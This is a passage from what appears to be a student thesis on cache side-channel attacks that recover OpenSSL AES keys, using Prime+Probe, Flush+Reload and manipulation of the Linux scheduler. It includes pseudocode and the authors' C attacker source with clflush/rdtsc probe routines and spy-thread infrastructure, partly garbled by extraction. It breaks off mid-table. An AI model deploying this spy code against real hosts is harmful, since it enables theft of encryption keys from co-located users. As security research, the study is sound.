in the cache. Attacker now has the information of the location of AES tables in
the memory, thus he knows the cache lines to which the tables are mapped. We
are targeting OpenSSL implementations of AES, which by default is shared,
so this scenario is also quite realistic.
In the subsequent sections we will look at the approaches to mount the attack in
both the scenarios. We will then comment on the practicality to launch the attacks
in such situations and problems faced in the implementation.
We will then propose our approach which is a combination of the above attacks
and how it can help us to mount the attack in practise.
Let us consider the first scenario, where the data tables are not shared and
thus attacker does not know the position of the cache.
6.2 Cache access measurement
We can use one of the below two techniques to find out the cache block(s) accessed
by the victim process.
1. Measurement using Evict+Time[7] In this method, we manipulate the
state of the cache before each encryption, and observe the execution time of
the subsequent encryption. In a chosen-plaintext setting, the method proceeds
as follows :
• For each table l = 0, 1, 2, 3 do
– For each block y = 0, 1 . . . 15 do
(a) For plaintext p, run AES to get the blocks used by AES into the
cache.
(b) For the same plaintext p, run AES again and measure the time taken
for encryption, cachedT ime, with all blocks in the cache
(c) (Evict Phase) Evict the block y of table l
21
(d) For the same plaintext p, run AES again and measure the time taken
for encryption after eviction, evictedT ime, with one block evicted.
(e) (Time Phase) Note the time taken for encryption with eviction
2. Measurement using Prime+Probe [7] This measurement method tries
to discover the set of memory blocks read by the encryption a posteriori, by
examining the state of the cache after encryption. The attacker allocates a
contiguous byte array A[0, ... , S∗W ∗B−1]. This method proceeds as follows :
• For each table l = 0, 1, 2, 3 do
– For each block y = 0, 1 . . . 15 do
(a) Access ’W’ memory block in ’A’ that map to same cache set as that
of y to evict the block y
(b) (Prime Phase) Read the same ’W’ memory block again and measure
the time taken to read all ’W’ blocks, cachedT ime, with all ’W’
blocks in cache
(c) For plaintext p, run AES to get the blocks used by AES into the
cache.
(d) (Probe Phase) Again read the same ’W’ blocks and measure the time
taken to read all ’W’ blocks, checkblockUsed times
Figure 6.1: Fig a,b,c are for Evict-Time, while Fig d,e are for Prime-Probe [7]
The problem with Evict + Time method is that, it will only give information
about one table access per encryption. So, to get the information about all the table
accesses during a particular encryption, we need to run the encryption of same plain
text for each cache set. If we assume, AES tables occupy 64 cache blocks, we need
to run this Evict + Time 64 times for measuring accesses of just single encryption.
This scenario is quite unrealistic, which requires same data to be encrypted again
and again.
22
Here, if we don’t know the offset from where the tables start, we need to fill the
whole cache again and again and measure the cache accesses of a small subset of
cache in which the tables reside. One optimization could be to first find out the
location where the AES tables are in the memory and then use the above strategies
by just filling a small portion of the cache. To find the location of the tables, we can
use Prime + Probe attack. We will simply give a score to each cache set if we find
out that some process has accessed that location. If we do this repeatedly, there
are high chances that the locations which are accessed by AES get a high score,
because they have been accessed each time we did our probe, while other may not
be accessed each time[9].
Figure 6.2: Graph showing cache sets with high Access Time. These are likely tobe the location where AES tables are mapped[9].
Once we fixed that these are the bounds of our tables, we can just fill these cache
lines only in Prime + Probe attack. The above method will not work in the case of
Hardware pre-fetching, where for every line accessed, the next line is automatically
fetched. We will discuss this in more details in further sections.
After getting the table accesses for each encryption, we will use One Round
and Two round attack to get the final key. These are discussed in the next
sections.
6.3 First Round Attack
For attacking AES, a natural approach is to observe the lookups performed in the
first round[7]. The table accesses are simply xi = pi ⊕ ki for all i = 0 - 15 each of
which depend on only one key byte and one plaintext. We already have the plaintext
for the encryption. So, any knowledge related to xi will reveal some information
about key bits.
23
Since each cache block contains 16 table entries and each table contains 256
entries, each table will be mapped to 16 cache blocks. Thus any information about
the access of any particular cache block gives information about the 16 entries as a
whole, i.e. about the first 4 bits. So, we will be able to figure out the first 4 bits of
each key byte using one round attack.
Ideally, we would require the first 16 accesses in order. However, in the given
scenario, we do not have that leverage. Rather, we have cache accesses of the whole
encryption, i.e. we know during the whole encryption which cache blocks out of
64/80 cache blocks are accessed by the victim process. In such scenario, we can
discover the partial information about key bytes as follow.
Consider the case where 〈pi⊕ ki〉4 is indeed present in the list of accesses of that
particular encryption. We can say that this key ki can be a probable candidate for
the actual key. However, if 〈pi ⊕ ki〉4 is not present in the list of accesses, we can
say for sure that this particular key byte will definitely not be my key. The reason
for this is, if this would have been my key byte, than the access corresponding to
〈pi ⊕ ki〉4 must be present in the list of accesses as this particular line must have
been accessed in the first round itself.
In real scenario, due to noise and inaccuracy of measurements, we will not remove
the key values if the corresponding access is not found, rather we will give each a
score of 1 every time it is found and a score of 0 if it is not found.
At the end, when we plot the graph the actual key values should have a peak
because if must have been there in all the encryptions.
This algorithm specifies how one round attack can be implemented.
Note: For plaintext bytes 0, 4, 8, 12 we look at table T0 and so on[1].
Algorithm 2 One Round Attack
1: while true do2: for each plaintext pi do3: for each possible key value (0-255) do4: xi ← 〈pi ⊕ ki〉45: if xi is present in list of accesses then6: graph[i][ki] ← graph[i][ki] + 17: end if8: end for9: end for10: end while
24
6.4 Second Round Attack
The above one round attack has reduced the key space from 128 bits to 64 bits as
for each key byte we are able to retrieve 4 bits. Second round attack is also based
on the same principle of cache accesses as the first round. The only difference is
that unlike the first round, where the cache accesses are simply 〈pi ⊕ ki〉4 the cache
accesses in the second round are based on the outcome of the first round. Each
round scrambles the data in non-linear fashion.
For the second round, we specifically exploit these 4 equations[16]:
Figure 6.3: Equations for second round attack
Here, the key bits which are S-boxed will affect the result of equation in a non
linear way. That means, a change in the least significant 4 bits of a key value can
affect the most significant value of the result. However, this is not the case with
the key byte which are directly xored. If we observe these equations, we will notice
that for each equation, we only have to find out the lower key bits of only 4 keys.
For example, in first equation, lower bits of only k0, k5, k10, k15 will affect the most
significant bits of the result, i.e. they will affect the table access.
So now, we have 16 possible values for each key byte, and each equation has
4 of them. Thus we have total of 164 = 65536 combinations. For each combina-
tion, we apply the same principle as before, i.e. giving the candidate score to that
combination using which we get the access in the list of accesses.
These attacks are based on the assumption that we accurately get the accesses
of the whole encryption. This requires proper synchronization between victim and
attacker process. This is not practical in most of the scenarios.
25
Chapter 7
Cache attacks by exploiting CFS
7.1 Overview
The synchronous attack that has been explained in the previous section is an effi-
cient way to recover key, howeve it is limited to scenarios where the attacker obtain
known plaintexts and has some interaction with the encryption code which allows
him to execute code synchronously before and after encryption. In this section we
describe a class of attacks that eliminate these prerequisites. The attacker will exe-
cute his own program on the same processor as the Victim program performing AES
encryption, but with no explicit interaction such as inter-process communication,
the only knowledge assumed is about a non-uniform distribution of the plaintexts
or ciphertexts.
This chapter describes an attack which is based on the assumption that the spy
process is able to observe every single memory access made by the victim. This high
granularity is achieved by exploiting the behaviour of Completely Fair Scheduler
(CFS) used by Linux kernel.
In next section, we deal with how CFS works and how it can be exploited to
allow the victim process so little time so that it can only make one access in that
duration.
7.2 Completely Fair Scheduler
To gather table accesses in case of shared memory scenario, we need some kind of
synchronization mechanism so that the attacker can observe each and every victim
access.
For this, we as an attacker requires that whenever we want, Operating System
should preempt the victim process and allow attacker to run, which in turn will
26
gather the required memory accesses. For this task of allotting CPU to processes,
scheduler comes into picture. This task of preempting the victim process at will and
gathering required accesses is not easy, as the scheduler has to maintain fairness
among all processes, while achieving maximum throughput at the same time.
So, for achieving the same, we need some kind of attck mechanism on scheduling
capability of Operating System. This paper deals with exploiting an implemenata-
tion of scheduler, known as Completely Fair Scheduler (CFS).
So, lets discuss in brief, how it perform the task of scheduling. This scheduler
tries to behave like an ideal system while giving fair share to each process. To
achieve this, it maintains a virtual runtime of each process, which denotes the time
spent by process while running. So, virtual runtime of running process will increase
at a particular moment in time.
CFS maintains fairness by allowing a process to increase it virtual runtime only
upto a certain bound, after which, it will preempt the process and will select the
process with least virtual runtime at that moment.
This is clearly explained with the help of the given diagram. Here, three processes
are running on a multitasking system. At start, process 1 is activated because it
has least virtual runtime. After allowing the process to run, its virtual runtime
will increase and at the point where maximum unfairness is reached, the next
process is scheduled.
Figure 7.1: Functioning of the Completely Fair Scheduler.[11]
7.3 Attacking CFS
This feature of fairness can be exploited by the attacker in the following way. The
basic idea is that the attacker process requests most of the available CPU while
27
leaving very small intervals for victim process. In this small time, victim access a
memory location, thus bringing the table in cache, and gets scheduled out. Attacker
then gains control and thus can figure out the cache line accessed by the victim. To
achieve this, the attacker process launches some hundred identical threads which ini-
tialize their virtual runtime to as low as possible by blocking for sufficiently amount
of time. The following steps are then performed in a round robin fashion:
• Upon getting activated, thread i first measures which memory access were
performed by V since the previous measurement.
• It then computes tsleep and twakeup, which designate the points in time when
thread i should block and thread i + 1 should unblock, respectively. It pro-
grams a timer to unblock thread i + 1 at twakeup.
• Finally, thread i enters a busy wait loop until tsleep is reached, where it blocks
to voluntarily yield the CPU.
Figure 7.2: Denial Of Service attack on CFS.[11]
Due to a large number of threads the virtual runtime will increase very slowly
and thus whenever scheduler looks at a process to run, it will always choose the
attacker process over victim.
7.4 Retrieving Key
Once we get the cache accesses, we can use the following method[11] to retrieve the
key.
28
AES encryption can be described by this single relation:
Y = M • s(X)⊕K. (7.1)
where, X and Y are state matrix before and after a particular encryption round,
M is the matrix for mix-column step.
X denotes the row-shifted matrix.
and K is the key.
Also, any two consecutive rounds of the same encryption can be put together in
the form of this equation.
ki∗ = y
i
∗ ⊕ (M • s(xi))∗ (7.2)
where, a denotes that it is the 4 byte column vector,
a denotes that the row shofting is applied,
a∗ denotes the leaked bits from cache accesses, which are 5 in case of compressed
table and 4 otherwise.
The basic steps of the finding the key bits are:
1. We treat each of the N accesses as the beginning of a round.
2. For each beginning, we calculate the potential candidates of keys from the
above equation.
3. Based on the different sets of potential candidates, we calculate the keys which
are most probable. This assumption is based on the fact that, if the potential
beginning is correct, the possible keys generated from those are correct.
29
Chapter 8
Design & Implementation of
Espionage Infrastructure
8.1 Flush+Reload Technique
The Flush+Reload attack is a powerful access-driven cache-based side-channel attack
technique. It was proposed by Gullasch et al.[11] but was first named by Yarom et
al.[18]. It usually employs a spy process to check if specific cache lines have been
accessed or not by the attacker’s code. The attack is carried out by a spy process
which works in 3 stages:
Flushing Stage :
In this stage, the attacker flushes the desired memory lines from the cache using
clflush command and hence make sure that they have to be retrieved from the
main memory next time they need to be accessed. The attack would work even if
attacker and victim reside on different cpu cores as clflush flushes memory lines
from all cpu cores.
Accessing the target :
Attacker waits until the Victim process runs a fragment of code, which might use
the memory lines that have been flushed in the first stage.
Reloading Stage :
In reload stage the attacker reloads again the previously flushed memory lines and
measures the time it takes to reload. Depending on the time taken to fetch the
memory lines, the attacker decides whether the victim accessed the memory line or
30
not. If victim would have accessed the memory lines then it would be present in
the cache and if not then it won’t be present in the cache. The following figures the
timing diagrams of various scenarios where victim and attacker accesses the same
cache line. Fig A and B shows the timing diagram without and with victim accessing
the cache line. While doing the experiments, we need to look for some cases, where
victim does not access the cache precisely at a time, which attacker wants. Rest
three diagram, C, D and E shows the timing diagram for such cases.
Figure 8.1: Flush - reload attack timings [18]
The implementation of attack is in Figure 8.2. The code measures the time
to read the data at a memory address and then evicts the memory line from the
cache[18]. The implementation has been given as code within the asm command.
The assembly code takes input as the address that is stored in %ecx (Line 16).
It returns the time to read this address in the register %eax which is stored in the
variable time(Line 15).
The threshold used in the attack is system dependent. For our core i-5 system,
we will set it to 100 that we will be discussing in the next section.
31
Figure 8.2: Code for the Flush+Reload Technique [18]
8.2 Our espionage infrastructure
Our espionage infrastructure in Figure 8.3 consists of three important parts:Spy
Controller [SC], Spy Ring and Centre of Advanced Analytics [CAA].
The SC residing in one cpu core controls the spy threads running on another core.
CAA, implemented with analytical abilities is responsible for providing dynamic
delay instructions to SC so that V can be restricted to fewer access to the memory
lines. Lower the value of the access to the memory lines by the Victim, more accurate
will be the results.
32
Figure 8.3: The Espionage Network.
For the successful attack, our aim is to execute spy threads and V as shown in
Figure 8.4. V is running on a core where spy rings are also scheduled by the SC.
This make OS to divide the CPU time quantum equally into spies and Victim. We
are calling each instance of V ( when V is getiing its turn to run) as run. In each
run of V, it performs the AES encryptions and brings data into cache. The default
time slice (or quantum) assigned by the OS to a process is large enough to make
thousands of cache accesses. So, to stop OS to provide this large quantum to V, our
espionage infrastructure restrict it to have very small time slice.
Figure 8.4: Timeline of victim and spy threads.
Scheduling is a central idea in multitasking Operating System where CPU time
has to be multiplexed in different running processes giving illusion of parallel execu-
tion. Completely Fair Scheduler has been equipped in all the Linux systems starting
from kernel version 2.6.23[11].
To ensure that fair time is allocated to the all processes, the CFS introduces the
concept of virtual runtime associated with each processes. In an ideal scenario, if
we consider total no. of processes running on a CPU core is n then time quantum
33
allocated to each of the processes is 1/n. To achieve this on a realtime system, the
CFS introduces a virtual runtime τi for every process i. In Figure 8.4, the sum of
the CPU times allocated to V is equal to that of the times given to each of the spy
threads running on that core.
In our attack implementation, each spy threads performs the measurement of
access times of each cache lines containing AES lookup tables and then flushes the
tables from all levels of cache. Each spy threads after performing above work signals
the SC through a shared variable, finished to awake the next threads of the ring.
It then waits for an amount of time δ1 before blocking on cond variable. This is
where the victim comes in the picture. All spy threads are in blocking state and OS
resumes the execution of Victim(V).
Algorithm 3 Spy Threads
1: SpyThreads Ti2: while true do3: for each cacheLine containing AES tables do4: if accessTime[cacheLine]< THRESHOLD then5: isAccessed[cacheLine] ← true6: clflush(cacheLine)7: end if8: end for9: mutexLock(var)10: finished← true11: mutexUnlock(var)12: delay loop by time = δ113: end while
The SC continuously checks on the finished flag, once it is true, it delay with
the δ2 time and signals the next spy in the ring to start its execution. The time
delay δ2 is optional as it is only required when no. of accesses by victim is more
than what is suitable for the attack. So, we can restrict the no. of accesses to the
lookup tables by varying the value of δ2.
Our attacks has been designed to work on multiple cores system. Before the
actual attack begin and Victim starts performing the AES encryptions, attacker
schedules its ring of spy threads into the same CPU cores where V reside. SC has to
work on another CPU core alone so that it can send signals without any battle for
the CPU immediately. The Centre for advanced analytics (CAA) can be employed
on any remaining cores including the cores at which SC execute.
The delay loops of δ1 and δ2 is used to fine tune the whole setup so that victim
34
Algorithm 4 Spy Controller
1: while true do2: while finished 6= true do3: end while4: delay loop by time = δ25: condSignal(nextThread)6: mutexLock(var)7: finished=false8: mutexUnlock(var)9: end while
could access the minimum cache lines in its time quantum. Increasing the value
of δ1 decreases the total no. of accesses by the victim as it will use some of the
portion of Victim time. Contrast to this, if we increase the value of δ2 it will allow
V to execute for δ2 extra time hence no. of accesses to the cache lines by V will be
increased.
The value of THRESHOLD in Algorithm 3 has been decided on the basis of time
taken to bring data back in cache after flushing it from all levels of cache memory.
The distribution of time taken(in ticks) for cache hits and miss has been clearly
presented in the Figure 8.5. On the basis of this, we fixed threshold = 100 ticks.
Figure 8.5: Frequency Vs Cache Access Time(ticks).
35
8.3 Approach for Attack
The previous attack is based on the assumption that we can get each access made
by victim. Now, a single table access generally takes less than 100 ns to complete.
That said, it means that victim is scheduled for just around 100 ns every time it
gets access. It seems quite unrealistic. To relax such constraints we propose a
combination of both the attacks, where we will exploit CFS to gather the memory
accesses and use the last table as a synchronization mechanism to know the table
accesses of an encryption.
In this case, we will assume shared table scenario, as the OpenSSL implemen-
tations which we are targeting are shared by default. Here, we assume that victim
is continuously encrypting the data and thus accessing the tables. This assumption
is very much realistic as we can consider the victim to be cloud service providing
encrypted data storage as a service with an unknown key. User, in this case the
attacker, can ask for the cloud service to encrypt the data, which then starts its
encryption sequence and continue encrypting till the end.
We will exploit CFS to gather memory accesses of the victim, but unlike the
previous case, we do not require each individual access, rather we can allow a chunk
of accesses to the victim. For example here, we will give the results of experiments
based on chunk of below 30 accesses.
After getting the accesses, we propose the following algorithm for achieving the
synchronization.
8.3.1 Algorithm
For each group of accesses, check the following:
If that group contains some last table entries, consider that group and next 2
groups as table accesses of next encryption.
This is because the group containing last table accesses can be in one of the
states and in each case, we justify our approach in Chapter 10.
After getting the accesses, we will use first round and second round attacks to
recover the complete AES key as described in section 6.3 and section 6.4.
36
Chapter 9
Coding
9.1 Experimental Setup
Our experiments were performed on Intel(R) Core-i5 2540M [email protected] ma-
chine running Debian Kali Linux 1.1.0, 64bit, kernel version 3.14.5/3.18 using the C
implementation of AES in OpenSSL 0.9.8a. This version of OpenSSL uses a separate
table for the last round of encryption. The core-i5 has 3-level cache architecture.
The L1 cache is 32KB (8-way associative), L2 cache is 256KB (8-way associative)
and L3 cache is 3MB (12-way associative). Each CPU core has private L1 and L2
cache whereas L3 is shared among different CPU cores.
The coding chapter includes code snippets of major components of our espionage
infrastructure. Source code for the attack has been written in basically C language
as the language in which kernel has been programmed is C. We have also written
various scripts in python to automate our attack and generate the results. The
major work done here is performed by SC and spy threads. The victim will be
performing the AES encryptions. For AES encryptions, we have used aes core file
that contains the tables and aes encrypt() function. In our Victim code, AES
encryptions is being performed 100 times with different plaintexts.
Followings are the major sections of the code in our attacker process:
9.2 Attacker source code
1 #de f i n e GNU SOURCE //Assuming a l l header f i l e s inc luded
2 #i f n d e f POSIX THREAD PROCESS SHARED
3 #er r o r This system does not support p roce s s shared mutex
4 #end i f
5
37
6 #de f i n e NUMTHREADS 15
7 #de f i n e MAXCOUNT 10000
8
9 i n t segmentId ;
10 i n t segmentChildId ;
11 i n t segmentcheckId ;
12 i n t ∗ currThread ;
13 i n t ∗ ch i l d ;
14 i n t ∗ ch e ck s t a t e ;
15 pthread cond t ∗ cvptr [NUMTHREADS+1] ;
16 pthr ead condat t r t c a t t r [NUMTHREADS+1] ;
17
18 pthread cond t ∗ cvptrChi ld ; //Condit ion Var iab le Po inte r s o f Child
19 pthr ead condat t r t ca t t rCh i l d ; //Condit ion Var iab le At t r ibute s o f Child
20 pthread mutex t ∗mptr [NUMTHREADS+1] ; //Mutex Po inte r s
21 pthread mutexatt r t matr [NUMTHREADS+1] ; //Mutex Att r ibute s
22
23 pthread mutex t ∗mptrChild ; //Mutex Po inte r s
24 pthread mutexatt r t matrChild ; //Mutex Att r ibute s
25
26
27 i n t shared mem id ; // shared memory Id
28 i n t ∗mp shared mem ptr ; // shared memory ptr −− po in t ing to mutex
29 i n t ∗ cv shared mem ptr ; // shared memory ptr −− po in t ing to cond i t i on
va r i ab l e
30
31 i n l i n e void c l f l u s h ( v o l a t i l e void ∗p)32 {33 asm v o l a t i l e ( ” c l f l u s h (%0)” : : ” r ” (p) ) ;
34 }35
36 unsigned long probe ( char ∗ adrs ) {37 v o l a t i l e unsigned long time ;
38 asm v o l a t i l e (
39 ” mfence \n”40 ” l f e n c e \n”41 ” rd t s c \n”42 ” l f e n c e \n”43 ” movl %%eax , %%e s i \n”44 ” movl (%1) , %%eax \n”45 ” l f e n c e \n”46 ” rd t s c \n”47 ” sub l %%es i , %%eax \n”48 ” c l f l u s h 0(%1) \n”49 : ”=a” ( time )
50 : ” c” ( adrs )
38
51 : ”%e s i ” , ”%edx” ) ;
52 re turn time ;
53 }54
55 s t r u c t s ha r ed u s e s t
56 {57 unsigned long long acc e s s count ;
58 i n t f l a g ;
59 i n t t h r e ad s t a t e ;
60 unsigned long long check count ;
61 } ;62
63 s t r u c t s ha r ed u s e s t ∗ s h a r e d s t u f f ;
64
65 create shared memory ( )
66 {67 void ∗ shared memory=(void ∗) 0 ;68
69 i n t shmid ;
70 shmid =shmget ( ( key t ) 1234 , 4096 , 0666 | IPC CREAT ) ;
71 shared memory =shmat ( shmid , ( void ∗) 0 ,0) ;72
73 i f ( shared memory == ( void ∗)−1)74 {75 f p r i n t f ( s tde r r , ”shmat f a i l e d \n” ) ;76 e x i t (EXIT FAILURE) ;
77 }78 s h a r e d s t u f f = ( s t r u c t s ha r ed u s e s t ∗) shared memory ;
79
80 }81
82 typede f s t r u c t thread parameters {83 long id ;
84 i n t loop count ;
85 } THREAD;
86
87 void ∗parentThreads ( void ∗ thread id )
88 {89 long t i d ;
90 t i d = ( long ) thread id ;
91 i n t s i d = s y s c a l l ( SYS gett id ) ;
92 i n t counter = 0 ,sum ;
93 unsigned long long s ta r t , end ;
94 unsigned long long changed sha r ed va r i ab l e a c c e s s c oun t [MAXCOUNT] ;
95 unsigned long long changed shar ed var i ab l e check count [MAXCOUNT] ;
96 unsigned long Access Time [MAXCOUNT] [ 8 0 ]={0} ;
39
97 i n t k=0;
98 FILE ∗ fp ,∗ fp2 ,∗ fp3 ;
99 pthread t thread ;
100 thread = p th r e a d s e l f ( ) ;
101
102 c pu s e t t my set ;
103 CPU ZERO(&my set ) ;
104 CPU SET(2 , &my set ) ;
105 s c h e d s e t a f f i n i t y (0 , s i z e o f ( c pu s e t t ) , &my set ) ;
106 i n t s ;
107
108 const u32 ∗p0=address (0 ) ;
109 const u32 ∗p1=address (1 ) ;
110 const u32 ∗p2=address (2 ) ;
111 const u32 ∗p3=address (3 ) ;
112 const u32 ∗p4=address (4 ) ;
113 void ∗p5=&AES set encrypt key ;
114 void ∗p6=&AES encrypt ;
115
116 // Flush a l l l l okup t ab l e s from cache
117 f o r ( s=0; s<18; s++)
118 {119 c l f l u s h ( ( void ∗) ( p0+s ∗16) ) ;120 // S im i l a r l y a l l o the r s t ab l e s
121 }122 whi le (1 )
123 {124
125 pthread mutex lock ( mptr [ t i d ] ) ;
126 whi le (∗ currThread != t i d )
127 {128 pthread cond wait ( cvptr [ t i d ] , mptr [ t i d ] ) ;
129
130 }131 pthread mutex unlock (mptr [ t i d ] ) ;
132
133 // s t o r e value o f shared va r i ab l e at the time o f r e c e i v i n g s i g n a l
134 changed sha r ed va r i ab l e a c c e s s c oun t [ counter ]= sha r ed s t u f f−>acc e s s count ;
135
136 i f ( counter==30 && t id ==0) // no t i f y V to s t a r t AES. We delayed i t
as to s t a r t AES at s t ab l e cond i t i on
137 s h a r ed s t u f f−>f l a g =1;
138
139 i f (∗ currThread == t id )
140 {
40
141 // Find Access time
142 f o r ( s=0; s<16; s++)
143 {144 k=0;
145 Access Time [ counter ] [ s+16∗k]=probe ( ( char ∗) ( p0+s ∗16) ) ;146 k=1;
147 // S im i l a r l y a l l f our remaining
148 }149
150 ∗ currThread = (∗ currThread + 1)%NUMTHREADS;
151 // s i g n a l to ch i l d
152 pthread mutex lock ( mptrChild ) ;
153 ∗ ch i l d =1;
154 pthread mutex unlock ( mptrChild ) ;
155
156 }157 counter++;
158 v o l a t i l e i n t check counter =0;
159 whi le ( check counter++<15) ;
160
161 i f ( counter==MAXCOUNT/NUMTHREADS)
162 {163 break ;
164 }165 }166 pthread mutex lock ( mptrChild ) ;
167 f o r ( counter=0; counter<(MAXCOUNT/NUMTHREADS) ; counter++)
168 {169 f o r ( k=0;k<5;k++)
170 {171 f o r ( s=0; s<16; s++)
172 {173 // p r i n t f ( ”%ld , Access Time[%d]=%lu \n” , t id , s+16∗k , Access Time [
counter ] [ s+16∗k ] ) ;174 i f ( Access Time [ counter ] [ s+16∗k ] < 150 )//==44 | |
Access Time [ counter ] [ s+16∗k ] ==48)
175 p r i n t f ( ”%d,%ld ,% l l u , Access Time , [%d] ,% lu \n” , counter , t id ,
changed sha r ed va r i ab l e a c c e s s c oun t [ counter ] , s+16∗k , Access Time [
counter ] [ s+16∗k ] ) ;176 }177 }178 }179 pthread mutex unlock (mptrChild ) ;
180
181 pth r ead ex i t (NULL) ;
182 }
41
183
184 i n t main ( )
185 {186 i n t rtn ;
187 s i z e t shm s ize ;
188 /∗ i n i t i a l i z e shared memory segment ∗/189 shm s ize = (NUMTHREADS+1)∗ s i z e o f ( pthread mutex t ) + (NUMTHREADS+1)∗
s i z e o f ( pthread cond t ) ; // f o r new cond va r i ab l e we added 1∗ s i z e o f (pthread cond t )
190
191 i f ( ( shared mem id = shmget (IPC PRIVATE, shm size , 0660) ) < 0)
192 {193 per ro r ( ”shmget” ) , e x i t (1 ) ;
194 }195 i f ( ( mp shared mem ptr = ( i n t ∗) shmat ( shared mem id , ( void ∗) 0 , 0) )
== NULL)
196 {197 per ro r ( ”shmat” ) , e x i t (1 ) ;
198 }199
200 i n t nt ;
201 unsigned char ∗ byte pt r = ( unsigned char ∗) ( mp shared mem ptr ) ;
202 f o r ( nt = 0 ; nt<=NUMTHREADS; nt++){203 mptr [ nt ] = ( pthread mutex t ∗) byte pt r ;
204 byte pt r += 1∗ s i z e o f ( pthread mutex t ) ;
205 cvptr [ nt ] = ( pthread cond t ∗) byte pt r ;
206 byte pt r += 1∗ s i z e o f ( pthread cond t ) ;
207 }208 mptrChild = ( pthread mutex t ∗)mptr [NUMTHREADS] ;
209 cvptrChi ld = ( pthread cond t ∗) cvptr [NUMTHREADS] ;
210
211 // Setup Mutex
212 f o r ( nt = 0 ; nt<=NUMTHREADS; nt++)
213 {214 i f ( r tn = pthr ead mutexa t t r i n i t (&matr [ nt ] ) )
215 {216 f p r i n t f ( s tde r r , ” p th r e a s mut exa t t r i n i t : %s ” , s t r e r r o r ( rtn ) )
, e x i t (1 ) ;
217 }218
219 //Setup Condit ion Var iab le
220 i f ( r tn = p th r e ad c onda t t r i n i t (& ca t t r [ nt ] ) )
221 {222 f p r i n t f ( s tde r r , ” p th r e ad c onda t t r i n i t : %s ” , s t r e r r o r ( rtn ) ) , e x i t (1 )
;
223 }
42
224 }225 i n t sha r eS i z e = s i z e o f ( i n t ) ∗ (2 + 1) ;
226 segmentId = shmget (IPC PRIVATE, shareS i ze , 0660) ;
227 currThread = ( i n t ∗) shmat ( segmentId , NULL, 0) ;
228 ∗ currThread = 0 ; // shared va r i ab l e f o r thread among parent and ch i l d
229
230 i n t s ha r e ch i l d = s i z e o f ( i n t ) ∗ (2 + 1) ;
231 segmentChildId = shmget (IPC PRIVATE, sha re ch i ld , 0660) ;
232 ch i l d = ( i n t ∗) shmat ( segmentChildId , NULL, 0) ;
233 ∗ ch i l d = 0 ; // shared va r i ab l e f o r thread among parent and ch i l d
234
235 i n t sharecheck = s i z e o f ( i n t ) ∗ (2 + 1) ;
236 segmentcheckId = shmget (IPC PRIVATE, sharecheck , 0660) ;
237 ch e ck s t a t e = ( i n t ∗) shmat ( segmentcheckId , NULL, 0) ;
238 ∗ ch e ck s t a t e = 0 ; // shared va r i ab l e f o r thread among parent and
ch i l d
239 create shared memory ( ) ;
240 s h a r ed s t u f f−>t h r e ad s t a t e =2;
241 s h a r ed s t u f f−>check count =0;
242
243 p id t pid , id ;
244 i n t i ;
245
246 pid = fo rk ( ) ;
247 id = getp id ( ) ;
248
249 i f ( pid > 0)
250 {251 // In parent
252 pthread t threads [NUMTHREADS] ;
253 i n t rc ;
254 long t ;
255 f o r ( t=0; t<NUMTHREADS; t++)
256 {257 rc = pthr ead c r ea t e (&threads [ t ] , NULL, parentThreads , ( void ∗) t ) ;258 i f ( rc )
259 {260 p r i n t f ( ”ERROR; return code from pthr ead c r ea t e ( ) i s %d\n”
, rc ) ;
261 e x i t (−1) ;262 }263 }264 pth r ead ex i t (NULL) ;
265
266 }267 e l s e
43
268 {269 // In Child
270 pthread t thread ;
271 thread = p th r e a d s e l f ( ) ;
272 c pu s e t t my set ; /∗ Def ine your cpu se t b i t mask . ∗/273 CPU ZERO(&my set ) ; /∗ I n i t i a l i z e i t a l l to 0 , i . e . no CPUs s e l e c t e d
. ∗/274 CPU SET(1 , &my set ) ; /∗ s e t the b i t that r ep r e s en t s core 1 . ∗/275 s c h e d s e t a f f i n i t y (0 , s i z e o f ( c pu s e t t ) , &my set ) ; /∗ Set a f f i n i t y o f
t h i s p roc e s s ∗/276 i n t check counter =0;
277 long i n t counter = 0 ;
278 whi le ( counter++<MAXCOUNT)
279 {280 whi le ( ! ∗ ch i l d ) ; // wait t i l l s e t by Thread
281 v o l a t i l e i n t wa i t c h i l d =0;
282 // whi l e ( wa i t c h i l d++<10) ;
283
284 pthread mutex lock ( mptrChild ) ;
285 ∗ ch i l d =0;
286 pthread mutex unlock ( mptrChild ) ;
287 pth r ead cond s i gna l ( cvptr [∗ currThread ] ) ;
288 }289 }290 re turn 1 ;
291 }
44
Chapter 10
Results and Analysis
The first thing that has to be decided by us is to check the time taken by the cache
memory to access the cache lines by the victim. From the previous experiment we
have seen in the figure 8.5 that time taken by V to access the memory lines from the
cache is in the range of 32-68 for our system. So, we decided the threshold value to
be 100 which clearly separate the value of time to bring data from cache and main
memory(which takes more than 200 ticks time).
On the basis of the threshold value decided in the section 8.2, we have performed
our experiment using our espionage network with different no. of spy threads. The
no. of accesses by Victim should decrease as we increase the no. of spy threads
(Section 8.2). The no. of distinct memory accesses has be clearly depicted in the
Figure10.1 and Figure10.2. We are currently able to restrict V to access only between
18-27 accesses in each run which is enough for the success of our attack.
For the proper understanding of our results, we have written codes in our Spy
Controller (Chapter 9) to print the exact cache lines into a file, accessed by the
Victim which was detected by the spy in its turn. So our access results includes the
no. of cache line accesses by the Victim in each run but detected in spy turn with
corresponding AES tables information.
45
Figure 10.1: #Accesses per run(#spy threads=10).
In Figure10.1, where no. of threads are 10 in spy ring, we can see that the
average accesses are in the range of 22-37 while in the case of Figure10.2, where
ring of spy threads contains 40 thrads, no. of accesses are in suitable range for our
attack.
Figure 10.2: #Accesses per run(#spy threads=40).
For the same plaintext encrypted 100 times by Victim, results of few access has
been shown in the following Figure 10.3. It clearly depict the start of encryption
46
where all the accesses are of AES look-up tables T0, T1, T2 and T3. Accesses in
the fifth table T4 depict the ending of the encryption as cache lines in the range of
64-79 is being accessed. Sometimes the tables of the new encryption can be noticed
in the last round of the previous encryption. This indicate that the last round of the
previous encryption include the few tables of the beginning of the next encryption.
Figure 10.3: Cache accesses detected by Spy threads.
We can resolve the above stated conflicting accesses for our attack as explained
in the Table 10.1
Here, we have taken ideal memory accesses from an actual implementation of
AES encryption of OpenSSL vs 0.9.8a. This part is basically to solidify our point,
that if we apply modifications as discussed in previous section, we will still be able
to generate the keys.
For such set-up, we made changes in OpenSSL AES code to print the table
accesses in a file, such that the table offsets are printed. We gathered this data for
as many as 100000 encryptions with a single key.
Results worth mentioning are explained here with the graphs as mentioned in
[4].
1. If in ideal scenario, attacker could get all the accesses of an encryption and
that too in order, only one encryption is needed to get the keys from the first
round attack, and less than 5 encryptions for the second round attack to
recover complete key.
47
S.No. Accesses contained in agroup with last table entries
Observations
